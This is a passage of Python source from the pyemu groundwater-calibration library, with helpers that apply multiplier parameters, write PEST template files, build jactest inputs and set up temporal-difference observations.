# TODO check use_cols is always present
apply_genericlist_pars(list_pars)
apply_array_pars(arr_pars,chunk_len=chunk_len)
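# A minimal usage sketch for a forward run script (assumes "mult2model_info.csv"
# was written by PstFrom into the run directory):
#
#   import pyemu
#   pyemu.helpers.apply_list_and_array_pars(arr_par_file="mult2model_info.csv",
#                                           chunk_len=50)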
def _process_chunk_fac2real(chunk,i):
for args in chunk:
pyemu.geostats.fac2real(**args)
print("process",i," processed ",len(chunk),"fac2real calls")
def _process_chunk_model_files(chunk,i,df):
for model_file in chunk:
_process_model_file(model_file, df)
print("process", i, " processed ", len(chunk), "process_model_file calls")
def _process_model_file(model_file, df):
# find all mults that need to be applied to this array
df_mf = df.loc[df.model_file == model_file, :]
results = []
org_file = df_mf.org_file.unique()
if org_file.shape[0] != 1:
raise Exception("wrong number of org_files for {0}".
format(model_file))
org_arr = np.loadtxt(org_file[0])
for mlt in df_mf.mlt_file:
if pd.isna(mlt):
continue
mlt_data = np.loadtxt(mlt)
if org_arr.shape != mlt_data.shape:
raise Exception("shape of org file {}:{} differs from mlt file {}:{}".format(org_file, org_arr.shape,
mlt, mlt_data.shape))
org_arr *= np.loadtxt(mlt)
if "upper_bound" in df.columns:
ub_vals = df_mf.upper_bound.value_counts().dropna().to_dict()
if len(ub_vals) == 0:
pass
elif len(ub_vals) > 1:
print(ub_vals)
raise Exception("different upper bound values for {0}".format(org_file))
else:
ub = float(list(ub_vals.keys())[0])
org_arr[org_arr>ub] = ub
if "lower_bound" in df.columns:
lb_vals = df_mf.lower_bound.value_counts().dropna().to_dict()
if len(lb_vals) == 0:
pass
elif len(lb_vals) > 1:
raise Exception("different lower bound values for {0}".format(org_file))
else:
lb = float(list(lb_vals.keys())[0])
org_arr[org_arr < lb] = lb
np.savetxt(model_file, np.atleast_2d(org_arr), fmt="%15.6E", delimiter='')
def apply_array_pars(arr_par="arr_pars.csv", arr_par_file=None,chunk_len=50):
""" a function to apply array-based multipler parameters.
Args:
arr_par (`str` or `pandas.DataFrame`): if type `str`,
path to csv file detailing parameter array multipliers.
This file can be written by PstFromFlopy.
if type `pandas.DataFrame` is Dataframe with columns of
['mlt_file', 'model_file', 'org_file'] and optionally
['pp_file', 'fac_file'].
chunk_len (`int`) : the number of files to process per chunk
with multiprocessing - applies to both the fac2real() calls and the
model input file processing. Default is 50.
Note:
Used to implement the parameterization constructed by
PstFromFlopyModel during a forward run
This function should be added to the forward_run.py script but can
be called on any correctly formatted csv
This function uses multiprocessing, farming out chunks of model input
arrays (and, optionally, pilot point files) to a pool of worker processes.
This speeds up execution considerably but means you need to make sure your
forward run script uses the proper multiprocessing idioms for
freeze support and main thread handling.
"""
if arr_par_file is not None:
warnings.warn("`arr_par_file` argument is deprecated and replaced "
"by arr_par. Method now support passing DataFrame as "
"arr_par arg.",
PyemuWarning)
arr_par = arr_par_file
if isinstance(arr_par, str):
df = pd.read_csv(arr_par, index_col=0)
elif isinstance(arr_par, pd.DataFrame):
df = arr_par
else:
raise TypeError("`arr_par` argument must be filename string or "
"Pandas DataFrame, "
"type {0} passed".format(type(arr_par)))
# for fname in df.model_file:
# try:
# os.remove(fname)
# except:
# print("error removing mult array:{0}".format(fname))
if 'pp_file' in df.columns:
print("starting fac2real", datetime.now())
pp_df = df.loc[df.pp_file.notna(),
['pp_file', 'fac_file', 'mlt_file']].rename(
columns={'fac_file': 'factors_file', 'mlt_file': 'out_file'})
pp_df.loc[:, 'lower_lim'] = 1.0e-10
# don't need to process all (e.g. if const. mults apply across kper...)
pp_args = pp_df.drop_duplicates().to_dict('records')
num_ppargs = len(pp_args)
num_chunk_floor = num_ppargs // chunk_len
main_chunks = np.array(pp_args)[:num_chunk_floor * chunk_len].reshape(
[-1, chunk_len]).tolist()
remainder = np.array(pp_args)[num_chunk_floor * chunk_len:].tolist()
chunks = main_chunks + [remainder]
pool = mp.Pool()
x = [pool.apply_async(_process_chunk_fac2real,args=(chunk,i)) for i,chunk in enumerate(chunks)]
[xx.get() for xx in x]
pool.close()
pool.join()
# procs = []
# for chunk in chunks:
# p = mp.Process(target=_process_chunk_fac2real, args=[chunk])
# p.start()
# procs.append(p)
# for p in procs:
# p.join()
print("finished fac2real", datetime.now())
print("starting arr mlt", datetime.now())
uniq = df.model_file.unique() # unique model input files to be produced
num_uniq = len(uniq) # number of input files to be produced
# number of files to send to each processor
# lazily splitting the files to be processed into even chunks
num_chunk_floor = num_uniq // chunk_len # number of whole chunks
main_chunks = uniq[:num_chunk_floor * chunk_len].reshape(
[-1, chunk_len]).tolist() # the list of files broken down into chunks
remainder = uniq[num_chunk_floor * chunk_len:].tolist() # remaining files
chunks = main_chunks + [remainder]
# procs = []
# for chunk in chunks: # now only spawn processor for each chunk
# p = mp.Process(target=_process_chunk_model_files, args=[chunk, df])
# p.start()
# procs.append(p)
# for p in procs:
# r = p.get(False)
# p.join()
pool = mp.Pool()
x = [pool.apply_async(_process_chunk_model_files,args=(chunk,i,df)) for i,chunk in enumerate(chunks)]
[xx.get() for xx in x]
pool.close()
pool.join()
print("finished arr mlt", datetime.now())
def apply_list_pars():
""" a function to apply boundary condition multiplier parameters.
Note:
Used to implement the parameterization constructed by
PstFromFlopyModel during a forward run
Requires either "temporal_list_pars.csv" or "spatial_list_pars.csv"
Should be added to the forward_run.py script
"""
temp_file = "temporal_list_pars.dat"
spat_file = "spatial_list_pars.dat"
temp_df, spat_df = None, None
if os.path.exists(temp_file):
temp_df = pd.read_csv(temp_file, delim_whitespace=True)
temp_df.loc[:, "split_filename"] = temp_df.filename.apply(lambda x: os.path.split(x)[-1])
org_dir = temp_df.list_org.iloc[0]
model_ext_path = temp_df.model_ext_path.iloc[0]
if os.path.exists(spat_file):
spat_df = pd.read_csv(spat_file, delim_whitespace=True)
spat_df.loc[:, "split_filename"] = spat_df.filename.apply(lambda x: os.path.split(x)[-1])
mlt_dir = spat_df.list_mlt.iloc[0]
org_dir = spat_df.list_org.iloc[0]
model_ext_path = spat_df.model_ext_path.iloc[0]
if temp_df is None and spat_df is None:
raise Exception("apply_list_pars() - no key dfs found, nothing to do...")
# load the spatial mult dfs
sp_mlts = {}
if spat_df is not None:
for f in os.listdir(mlt_dir):
pak = f.split(".")[0].lower()
df = pd.read_csv(os.path.join(mlt_dir, f), index_col=0, delim_whitespace=True)
# if pak != 'hfb6':
df.index = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}".format(x.k, x.i, x.j), axis=1)
# else:
# df.index = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}{2:04.0f}{2:04.0f}".format(x.k, x.irow1, x.icol1,
# x.irow2, x.icol2), axis = 1)
if pak in sp_mlts.keys():
raise Exception("duplicate multiplier csv for pak {0}".format(pak))
if df.shape[0] == 0:
raise Exception("empty dataframe for spatial list file: {0}".format(f))
sp_mlts[pak] = df
org_files = os.listdir(org_dir)
# for fname in df.filename.unique():
for fname in org_files:
# need to get the PAK name to handle stupid horrible expceptions for HFB...
# try:
# pakspat = sum([True if fname in i else False for i in spat_df.filename])
# if pakspat:
# pak = spat_df.loc[spat_df.filename.str.contains(fname)].pak.values[0]
# else:
# pak = 'notHFB'
# except:
# pak = "notHFB"
names = None
if temp_df is not None and fname in temp_df.split_filename.values:
temp_df_fname = temp_df.loc[temp_df.split_filename == fname, :]
if temp_df_fname.shape[0] > 0:
names = temp_df_fname.dtype_names.iloc[0].split(',')
if spat_df is not None and fname in spat_df.split_filename.values:
spat_df_fname = spat_df.loc[spat_df.split_filename == fname, :]
if spat_df_fname.shape[0] > 0:
names = spat_df_fname.dtype_names.iloc[0].split(',')
if names is not None:
df_list = pd.read_csv(os.path.join(org_dir, fname),
delim_whitespace=True, header=None, names=names)
df_list.loc[:, "idx"] = df_list.apply(
lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}".format(x.k - 1, x.i - 1, x.j - 1), axis=1)
df_list.index = df_list.idx
pak_name = fname.split('_')[0].lower()
if pak_name in sp_mlts:
mlt_df = sp_mlts[pak_name]
mlt_df_ri = mlt_df.reindex(df_list.index)
for col in df_list.columns:
if col in ["k", "i", "j", "inode", 'irow1', 'icol1', 'irow2', 'icol2', 'idx']:
continue
if col in mlt_df.columns:
# print(mlt_df.loc[mlt_df.index.duplicated(),:])
# print(df_list.loc[df_list.index.duplicated(),:])
df_list.loc[:, col] *= mlt_df_ri.loc[:, col].values
if temp_df is not None and fname in temp_df.split_filename.values:
temp_df_fname = temp_df.loc[temp_df.split_filename == fname, :]
for col, val in zip(temp_df_fname.col, temp_df_fname.val):
df_list.loc[:, col] *= val
fmts = ''
for name in names:
if name in ["i", "j", "k", "inode", 'irow1', 'icol1', 'irow2', 'icol2']:
fmts += " %9d"
else:
fmts += " %9G"
np.savetxt(os.path.join(model_ext_path, fname), df_list.loc[:, names].values, fmt=fmts)
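# A minimal usage sketch (assumes "temporal_list_pars.dat" and/or
# "spatial_list_pars.dat" were written by PstFromFlopyModel into the run directory):
#
#   import pyemu
#   pyemu.helpers.apply_list_pars()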
def apply_genericlist_pars(df):
""" a function to apply list style mult parameters
Args:
df (pandas.DataFrame): DataFrame that relates files containing
multipliers to model input file names. Required columns include:
{"model_file": file name of resulatant model input file,
"org_file": file name of original file that multipliers act on,
"fmt": format specifier for model input file
(currently only 'free' is supported),
"sep": separator for model input file if 'free' formatted,
"head_rows": Number of header rows to transfer from orig file
to model file,
"index_cols": list of columns (either indexes or strings) to be
used to align mults, orig and model files,
"use_cols": columns to mults act on,
"upper_bound": ultimate upper bound for model input file
parameter,
"lower_bound": ultimate lower bound for model input file
parameter}
"""
uniq = df.model_file.unique()
for model_file in uniq:
print("processing model file:",model_file)
df_mf = df.loc[df.model_file == model_file, :].copy()
# read data stored in org (mults act on this)
org_file = df_mf.org_file.unique()
if org_file.shape[0] != 1:
raise Exception("wrong number of org_files for {0}".
format(model_file))
org_file = org_file[0]
print("org file:",org_file)
notfree = df_mf.fmt[df_mf.fmt != 'free']
if len(notfree) > 1:
raise Exception("too many different format specifiers for "
"model file: {0}".format(model_file))
elif len(notfree) == 1:
fmt = notfree.values[0]
else:
fmt = df_mf.fmt.values[-1]
if fmt == 'free':
if df_mf.sep.dropna().nunique() > 1:
raise Exception("too many different sep specifiers for "
"model file: {0}".format(model_file))
else:
sep = df_mf.sep.dropna().values[-1]
else:
sep = None
datastrtrow = df_mf.head_rows.values[-1]
if fmt.lower() == 'free' and sep == ' ':
delim_whitespace = True
if datastrtrow > 0:
with open(org_file, 'r') as fp:
storehead = [next(fp) for _ in range(datastrtrow)]
else:
storehead = []
# work out if headers are used for index_cols
index_col_eg = df_mf.index_cols.iloc[-1][0]
if isinstance(index_col_eg, str):
# TODO: add test for model file with headers
# index_cols can be from header str
header = 0
hheader=True
elif isinstance(index_col_eg, int):
# index_cols are column numbers in input file
header = None
hheader = None
# actually do need index cols to be list of strings
# to be compatible when the saved original file is read in.
df_mf.loc[:, 'index_cols'] = df_mf.index_cols.apply(
lambda x: [str(i) for i in x])
# if written by PstFrom this should always be comma delim - tidy
org_data = pd.read_csv(org_file, skiprows=datastrtrow,
header=header)
# mult columns will be string type, so to make sure they align
org_data.columns = org_data.columns.astype(str)
print("org_data columns:",org_data.columns)
print("org_data shape:",org_data.shape)
new_df = org_data.copy()
for mlt in df_mf.itertuples():
try:
new_df = new_df.reset_index().rename(
columns={'index': 'oidx'}).set_index(mlt.index_cols)
new_df = new_df.sort_index()
except Exception as e:
print("error setting mlt index_cols: ",str(mlt.index_cols)," for new_df with cols: ",list(new_df.columns))
raise Exception("error setting mlt index_cols: "+str(e))
if not hasattr(mlt,"mlt_file") or pd.isna(mlt.mlt_file):
print("null mlt file for org_file '" + org_file + "', continuing...")
else:
mlts = pd.read_csv(mlt.mlt_file)
# get mult index to align with org_data,
# mult idxs will always be written zero based
# if the original model file is not zero based, need to add 1
add1 = int(mlt.zero_based == False)
mlts.index = pd.MultiIndex.from_tuples(mlts.sidx.apply(
lambda x: tuple(add1 + np.array(literal_eval(x)))),
names=mlt.index_cols)
if mlts.index.nlevels < 2: # just in case only one index col is used
mlts.index = mlts.index.get_level_values(0)
common_idx = new_df.index.intersection(
mlts.index).sort_values().drop_duplicates()
mlt_cols = [str(col) for col in mlt.use_cols]
new_df.loc[common_idx, mlt_cols] = (new_df.loc[common_idx, mlt_cols]
* mlts.loc[common_idx, mlt_cols]
).values
# bring mult index back to columns AND re-order
new_df = new_df.reset_index().set_index(
'oidx')[org_data.columns].sort_index()
if "upper_bound" in df.columns:
ub = df_mf.apply(
lambda x: pd.Series(
{str(c): b for c, b in
zip(x.use_cols, x.upper_bound)}), axis=1).max()
if ub.notnull().any():
for col, val in ub.items():
new_df.loc[new_df.loc[:, col] > val, col] = val
if "lower_bound" in df.columns:
lb = df_mf.apply(
lambda x: pd.Series(
{str(c): b for c, b in
zip(x.use_cols, x.lower_bound)}), axis=1).min()
if lb.notnull().any():
for col, val in lb.items():
new_df.loc[new_df.loc[:, col] < val, col] = val
with open(model_file, 'w') as fo:
kwargs = {}
if "win" in platform.platform().lower():
kwargs = {"line_terminator": "\n"}
if len(storehead) != 0:
fo.write('\n'.join(storehead))
fo.flush()
if fmt.lower() == 'free':
new_df.to_csv(fo, index=False, mode='a',
sep=sep, header=hheader,
**kwargs)
else:
np.savetxt(fo, np.atleast_2d(new_df.values), fmt=fmt)
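# Illustrative sketch of the DataFrame this function expects (column values here are
# hypothetical - the real frame is written by PstFrom, e.g. to "mult2model_info.csv"):
#
#   import pandas as pd
#   df = pd.DataFrame([{"model_file": "wel_data.csv",
#                       "org_file": "org/wel_data.csv",
#                       "mlt_file": "mult/wel_grid.csv",
#                       "fmt": "free", "sep": ",", "head_rows": 0,
#                       "index_cols": ["k", "i", "j"], "use_cols": ["flux"],
#                       "upper_bound": [None], "lower_bound": [None],
#                       "zero_based": True}])
#   apply_genericlist_pars(df)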
def write_const_tpl(name, tpl_file, suffix, zn_array=None,
shape=None, longnames=False):
""" write a constant (uniform) template file for a 2-D array
Args:
name (`str`): the base parameter name
tpl_file (`str`): the template file to write
suffix (`str`): suffix to append to parameter names
zn_array (`numpy.ndarray`, optional): an array used to skip inactive cells,
and optionally get shape info.
shape (`tuple`): tuple nrow and ncol. Either `zn_array` or `shape`
must be passed
longnames (`bool`): flag to use longer names that exceed 12 chars in length.
Default is False.
Returns:
`pandas.DataFrame`: a dataframe with parameter information
"""
if shape is None and zn_array is None:
raise Exception("must pass either zn_array or shape")
elif shape is None:
shape = zn_array.shape
parnme = []
with open(tpl_file, 'w') as f:
f.write("ptf ~\n")
for i in range(shape[0]):
for j in range(shape[1]):
if zn_array is not None and zn_array[i, j] < 1:
pname = " 1.0 "
else:
if longnames:
pname = "const_{0}_{1}".format(name, suffix)
else:
pname = "{0}{1}".format(name, suffix)
if len(pname) > 12:
warnings.warn("zone pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = " ~ {0} ~".format(pname)
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme}, index=parnme)
# df.loc[:,"pargp"] = "{0}{1}".format(self.cn_suffixname)
df.loc[:, "pargp"] = "{0}_{1}".format(suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
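# A hedged usage sketch: write a single constant multiplier template for a 2-D array
# (the name, suffix, file name and shape here are illustrative):
#
#   df = write_const_tpl("hk", "hk_layer1_const.dat.tpl", "cn", shape=(20, 30))
#   print(df.parnme.unique())  # -> one constant parameter name ("hkcn") for the whole array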
def write_grid_tpl(name, tpl_file, suffix, zn_array=None, shape=None,
spatial_reference=None, longnames=False):
""" write a grid-based template file for a 2-D array
Args:
name (`str`): the base parameter name
tpl_file (`str`): the template file to write - include path
suffix (`str`): suffix used in parameter and group names
zn_array (`numpy.ndarray`, optional): zone array to identify
inactive cells. Default is None
shape (`tuple`, optional): a length-two tuple of nrow and ncol. Either
`zn_array` or `shape` must be passed.
spatial_reference (`flopy.utils.SpatialReference`): a spatial reference instance.
If `longnames` is True, then `spatial_reference` is used to add spatial info
to the parameter names.
longnames (`bool`): flag to use longer names that exceed 12 chars in length.
Default is False.
Returns:
`pandas.DataFrame`: a dataframe with parameter information
"""
if shape is None and zn_array is None:
raise Exception("must pass either zn_array or shape")
elif shape is None:
shape = zn_array.shape
parnme, x, y = [], [], []
with open(tpl_file, 'w') as f:
f.write("ptf ~\n")
for i in range(shape[0]):
for j in range(shape[1]):
if zn_array is not None and zn_array[i, j] < 1:
pname = ' 1.0 '
else:
if longnames:
pname = "{0}_i:{0}_j:{1}_{2}".format(name, i, j, suffix)
if spatial_reference is not None:
pname += "_x:{0:10.2E}_y:{1:10.2E}".format(
spatial_reference.xcentergrid[i,j],
spatial_reference.ycentergrid[i,j])
else:
pname = "{0}{1:03d}{2:03d}".format(name, i, j)
if len(pname) > 12:
warnings.warn("grid pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = ' ~ {0} ~ '.format(pname)
if spatial_reference is not None:
x.append(spatial_reference.xcentergrid[i, j])
y.append(spatial_reference.ycentergrid[i, j])
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme}, index=parnme)
if spatial_reference is not None:
df.loc[:, 'x'] = x
df.loc[:, 'y'] = y
df.loc[:, "pargp"] = "{0}_{1}".format(suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
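# A hedged usage sketch: one parameter per active cell of a 2-D array
# (the zone array and file name here are illustrative):
#
#   import numpy as np
#   ib = np.ones((20, 30), dtype=int)  # 1 = active, <1 = skipped
#   df = write_grid_tpl("hk", "hk_gr.dat.tpl", "gr", zn_array=ib)
#   # df has one row per active cell, with parnme like "hk000000" ... "hk019029"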
def write_zone_tpl(name, tpl_file, suffix="", zn_array=None, shape=None,
longnames=False,fill_value="1.0"):
""" write a zone-based template file for a 2-D array
Args:
name (`str`): the base parameter name
tpl_file (`str`): the template file to write
suffix (`str`): suffix to add to parameter names. Only used if `longnames=True`
zn_array (`numpy.ndarray`, optional): an array used to skip inactive cells,
and optionally get shape info. zn_array values less than 1 are given `fill_value`
shape (`tuple`): tuple nrow and ncol. Either `zn_array` or `shape`
must be passed
longnames (`bool`): flag to use longer names that exceed 12 chars in length.
Default is False.
fill_value (`str`): value to fill locations where `zn_array` is less than 1.0.
Default is "1.0".
Returns:
`pandas.DataFrame`: a dataframe with parameter information
"""
if shape is None and zn_array is None:
raise Exception("must pass either zn_array or shape")
elif shape is None:
shape = zn_array.shape
parnme = []
zone = []
with open(tpl_file, 'w') as f:
f.write("ptf ~\n")
for i in range(shape[0]):
for j in range(shape[1]):
if zn_array is not None and zn_array[i, j] < 1:
pname = " {0} ".format(fill_value)
else:
zval = 1
if zn_array is not None:
zval = zn_array[i, j]
if longnames:
pname = "{0}_zone:{1}_{2}".format(name, zval, suffix)
else:
pname = "{0}_zn{1}".format(name, zval)
if len(pname) > 12:
warnings.warn("zone pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
zone.append(zval)
pname = " ~ {0} ~".format(pname)
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme,"zone":zone}, index=parnme)
df.loc[:, "pargp"] = "{0}_{1}".format(suffix.replace("_", ''), name)
return df
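# A hedged usage sketch: one parameter per zone value in a 2-D zone array
# (the zone array and file name here are illustrative):
#
#   import numpy as np
#   zones = np.ones((20, 30), dtype=int)
#   zones[:, 15:] = 2
#   df = write_zone_tpl("hk", "hk_zn.dat.tpl", zn_array=zones)
#   # df.parnme contains "hk_zn1" and "hk_zn2"; cells with zone < 1 get fill_value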
def build_jac_test_csv(pst, num_steps, par_names=None, forward=True):
""" build a dataframe of jactest inputs for use with sweep
Args:
pst (`pyemu.Pst`): existing control file
num_steps (`int`): number of perturbation steps for each parameter
par_names ([`str`]): list of parameter names of pars to test.
If None, all adjustable pars are used. Default is None
forward (`bool`): flag to start with forward perturbations.
Default is True
Returns:
`pandas.DataFrame`: the sequence of model runs to evaluate
for the jactesting.
"""
if isinstance(pst, str):
pst = pyemu.Pst(pst)
# pst.add_transform_columns()
pst.build_increments()
incr = pst.parameter_data.increment.to_dict()
irow = 0
par = pst.parameter_data
if par_names is None:
par_names = pst.adj_par_names
total_runs = num_steps * len(par_names) + 1
idx = ["base"]
for par_name in par_names:
idx.extend(["{0}_{1}".format(par_name, i) for i in range(num_steps)])
df = pd.DataFrame(index=idx, columns=pst.par_names)
li = par.partrans == "log"
lbnd = par.parlbnd.copy()
ubnd = par.parubnd.copy()
lbnd.loc[li] = lbnd.loc[li].apply(np.log10)
ubnd.loc[li] = ubnd.loc[li].apply(np.log10)
lbnd = lbnd.to_dict()
ubnd = ubnd.to_dict()
org_vals = par.parval1.copy()
org_vals.loc[li] = org_vals.loc[li].apply(np.log10)
if forward:
sign = 1.0
else:
sign = -1.0
# base case goes in as first row, no perturbations
df.loc["base", pst.par_names] = par.parval1.copy()
irow = 1
full_names = ["base"]
for jcol, par_name in enumerate(par_names):
org_val = org_vals.loc[par_name]
last_val = org_val
for step in range(num_steps):
vals = org_vals.copy()
i = incr[par_name]
val = last_val + (sign * incr[par_name])
if val > ubnd[par_name]:
sign = -1.0
val = org_val + (sign * incr[par_name])
if val < lbnd[par_name]:
raise Exception("parameter {0} went out of bounds".
format(par_name))
elif val < lbnd[par_name]:
sign = 1.0
val = org_val + (sign * incr[par_name])
if val > ubnd[par_name]:
raise Exception("parameter {0} went out of bounds".
format(par_name))
vals.loc[par_name] = val
vals.loc[li] = 10 ** vals.loc[li]
df.loc[idx[irow], pst.par_names] = vals
full_names.append("{0}_{1:<15.6E}".format(par_name, vals.loc[par_name]).strip())
irow += 1
last_val = val
df.index = full_names
return df
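# A hedged usage sketch: build the jactest run sequence and save it for use with a
# sweep-style run manager (control file and csv names here are illustrative):
#
#   pst = pyemu.Pst("my.pst")
#   df = build_jac_test_csv(pst, num_steps=5)
#   df.to_csv("sweep_in.csv")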
def _write_df_tpl(filename, df, sep=',', tpl_marker='~', **kwargs):
"""function write a pandas dataframe to a template file.
"""
if "line_terminator" not in kwargs:
if "win" in platform.platform().lower():
kwargs["line_terminator"] = "\n"
with open(filename, 'w') as f:
f.write("ptf {0}\n".format(tpl_marker))
f.flush()
df.to_csv(f, sep=sep, mode='a', **kwargs)
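# Minimal sketch of the template-file layout produced by _write_df_tpl(): a "ptf ~"
# header line followed by the dataframe written as csv, e.g. (contents illustrative):
#
#   ptf ~
#   index,col1
#   0,~ par1 ~
#   1,~ par2 ~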
def setup_fake_forward_run(pst, new_pst_name, org_cwd='.', bak_suffix="._bak", new_cwd='.'):
"""setup a fake forward run for a pst.
Args:
pst (`pyemu.Pst`): existing control file
new_pst_name (`str`): new control file to write
org_cwd (`str`): existing working dir. Default is "."
bak_suffix (`str`, optional): suffix to add to existing
model output files when making backup copies.
new_cwd (`str`): new working dir. Default is ".".
Note:
The fake forward run simply copies existing backup versions of
model output files to the output files PEST(++) is looking
for. This is really a development option for debugging
PEST++ issues.
"""
if new_cwd != org_cwd and not os.path.exists(new_cwd):
os.mkdir(new_cwd)
pairs = {}
for output_file in pst.output_files:
org_pth = os.path.join(org_cwd, output_file)
new_pth = os.path.join(new_cwd, os.path.split(output_file)[-1])
assert os.path.exists(org_pth), org_pth
shutil.copy2(org_pth, new_pth + bak_suffix)
pairs[output_file] = os.path.split(output_file)[-1] + bak_suffix
if new_cwd != org_cwd:
for files in [pst.template_files, pst.instruction_files]:
for f in files:
raw = os.path.split(f)
if len(raw[0]) == 0:
raw = raw[1:]
if len(raw) > 1:
pth = os.path.join(*raw[:-1])
pth = os.path.join(new_cwd, pth)
if not os.path.exists(pth):
os.makedirs(pth)
org_pth = os.path.join(org_cwd, f)
new_pth = os.path.join(new_cwd, f)
assert os.path.exists(org_pth), org_pth
shutil.copy2(org_pth, new_pth)
for f in pst.input_files:
raw = os.path.split(f)
if len(raw[0]) == 0:
raw = raw[1:]
if len(raw) > 1:
pth = os.path.join(*raw[:-1])
pth = os.path.join(new_cwd, pth)
if not os.path.exists(pth):
os.makedirs(pth)
for key, f in pst.pestpp_options.items():
if not isinstance(f, str):
continue
raw = os.path.split(f)
if len(raw[0]) == 0:
raw = raw[1:]
if len(raw) > 1:
pth = os.path.join(*raw[:-1])
pth = os.path.join(new_cwd, pth)
if not os.path.exists(pth):
os.makedirs(pth)
org_pth = os.path.join(org_cwd, f)
new_pth = os.path.join(new_cwd, f)
if os.path.exists(org_pth):
shutil.copy2(org_pth, new_pth)
with open(os.path.join(new_cwd, "fake_forward_run.py"), 'w') as f:
f.write("import os\nimport shutil\n")
for org, bak in pairs.items():
f.write("shutil.copy2(r'{0}',r'{1}')\n".format(bak, org))
pst.model_command = "python fake_forward_run.py"
pst.write(os.path.join(new_cwd, new_pst_name))
return pst
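# A hedged usage sketch (file and directory names are illustrative): back up the model
# outputs and write a control file whose "model" just restores those backups:
#
#   pst = pyemu.Pst("my.pst")
#   setup_fake_forward_run(pst, "fake.pst", org_cwd="template", new_cwd="fake_run")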
def setup_temporal_diff_obs(pst, ins_file, out_file=None,
include_zero_weight=False, include_path=False,
sort_by_name=True,long_names=True,
prefix="dif"):
""" a helper function to setup difference-in-time observations based on an existing
set of observations in an instruction file using the observation grouping in the
control file
Args:
pst (`pyemu.Pst`): existing control file
ins_file (`str`): an existing instruction file
out_file (`str`, optional): an existing model output file that corresponds to
the instruction file. If None, `ins_file.replace(".ins","")` is used
include_zero_weight (`bool`, optional): flag to include zero-weighted observations
in the difference observation process. Default is False so that only non-zero
weighted observations are used.
include_path (`bool`, optional): flag to setup the file processing in the directory where the ins_file
is located (if different from where python is running). This is useful for setting up
the process in a separate directory from where python is running.
sort_by_name (`bool`,optional): flag to sort observation names in each group prior to setting up
the differencing. The order of the observations matters for the differencing. If False, then
the control file order is used. If observation names have a datetime suffix, make sure the format is
year-month-day to use this sorting. Default is True
long_names (`bool`, optional): flag to use long, descriptive names by concatenating the two observation names
that are being differenced. This will produce names that are too long for traditional PEST(_HP).
Default is True.
prefix (`str`, optional): prefix to prepend to observation names and group names. Default is "dif".
Returns:
tuple containing
- **str**: the forward run command to execute the binary file process during model runs.
- **pandas.DataFrame**: a dataframe of observation information for use in the pest control file
Note:
this is the companion function of `helpers.apply_temporal_diff_obs()`.
"""
if not os.path.exists(ins_file):
raise Exception("setup_temporal_diff_obs() error: ins_file '{0}' not found". \
format(ins_file))
# the ins routines will check for missing obs, etc
try:
ins = pyemu.pst_utils.InstructionFile(ins_file, pst)
except Exception as e:
raise Exception("setup_temporal_diff_obs(): error processing instruction file: {0}". \
format(str(e)))
if out_file is None:
out_file = ins_file.replace(".ins", "")
# find obs groups from the obs names in the ins that have more than one observation
# (cant diff single entry groups)
obs = pst.observation_data
if include_zero_weight:
group_vc = pst.observation_data.loc[ins.obs_name_set, "obgnme"].value_counts()
else:
group_vc = obs.loc[obs.apply(lambda x: x.weight > 0 and \
x.obsnme in ins.obs_name_set, axis=1),\
"obgnme"].value_counts()
groups = list(group_vc.loc[group_vc > 1].index)
if len(groups) == 0:
raise Exception("setup_temporal_diff_obs() error: no obs groups found " +
"with more than one non-zero weighted obs")
# process each group
diff_dfs = []
for group in groups:
# get a sub dataframe with non-zero weighted obs that are in this group and in the instruction file
obs_group = obs.loc[obs.obgnme == group,:].copy()
obs_group = obs_group.loc[obs_group.apply(lambda x: x.weight > 0 and x.obsnme in ins.obs_name_set,axis=1),:]
# sort if requested
if sort_by_name:
obs_group = obs_group.sort_values(by="obsnme",ascending=True)
# the names starting with the first
diff1 = obs_group.obsnme[:-1].values
# the names ending with the last
diff2 = obs_group.obsnme[1:].values
# form a dataframe
diff_df = pd.DataFrame({"diff1":diff1,"diff2":diff2})
#build up some obs names
if long_names:
diff_df.loc[:,"obsnme"] = ["{0}_{1}__{2}".format(prefix,d1,d2) for d1,d2 in zip(diff1,diff2)]
else:
diff_df.loc[:,"obsnme"] = ["{0}_{1}_{2}".format(prefix,group,c) for c in len(diff1)]
# set the obs names as the index (per usual)
diff_df.index = diff_df.obsnme
# set the group name for the diff obs
diff_df.loc[:,"obgnme"] = "{0}_{1}".format(prefix,group)
# set the weights using the standard prop of variance formula
d1_std,d2_std = 1./obs_group.weight[:-1].values,1./obs_group.weight[1:].values
diff_df.loc[:,"weight"] = 1./(np.sqrt((d1_std**2)+(d2_std**2)))
diff_dfs.append(diff_df)
# concat all the diff dataframes
diff_df = pd.concat(diff_dfs)
#save the dataframe as a config file
config_file = ins_file.replace(".ins",".diff.config")
f = open(config_file, 'w')
if include_path:
#ins_path = os.path.split(ins_file)[0]
#f = open(os.path.join(ins_path,config_file),'w')
f.write("{0},{1}\n".format(os.path.split(ins_file)[-1],os.path.split(out_file)[-1]))
#diff_df.to_csv(os.path.join(ins_path,config_file))
else:
f.write("{0},{1}\n".format(ins_file,out_file))
#diff_df.to_csv(os.path.join(config_file))
f.flush()
diff_df.to_csv(f,mode="a")
f.flush()
f.close()
# write the instruction file
diff_ins_file = config_file.replace(".config", ".processed.ins")
with open(diff_ins_file, 'w') as f:
f.write("pif ~\n")
f.write("l1 \n")
for oname in diff_df.obsnme:
f.write("l1 w w w !{0}! \n".format(oname))
if include_path:
config_file = os.path.split(config_file)[-1]
diff_ins_file = os.path.split(diff_ins_file)[-1]
# if the corresponding output file exists, try to run the routine
if os.path.exists(out_file):
if include_path:
b_d = os.getcwd()
ins_path = os.path.split(ins_file)[0]
os.chdir(ins_path)
# try:
processed_df = apply_temporal_diff_obs(config_file=config_file)
# except Exception as e:
# if include_path:
# os.chdir(b_d)
#
# ok, now we can use the new instruction file to process the diff outputs
ins = pyemu.pst_utils.InstructionFile(diff_ins_file)
ins_pro_diff_df = ins.read_output_file(diff_ins_file.replace(".ins",""))
if include_path:
os.chdir(b_d)
print(ins_pro_diff_df)
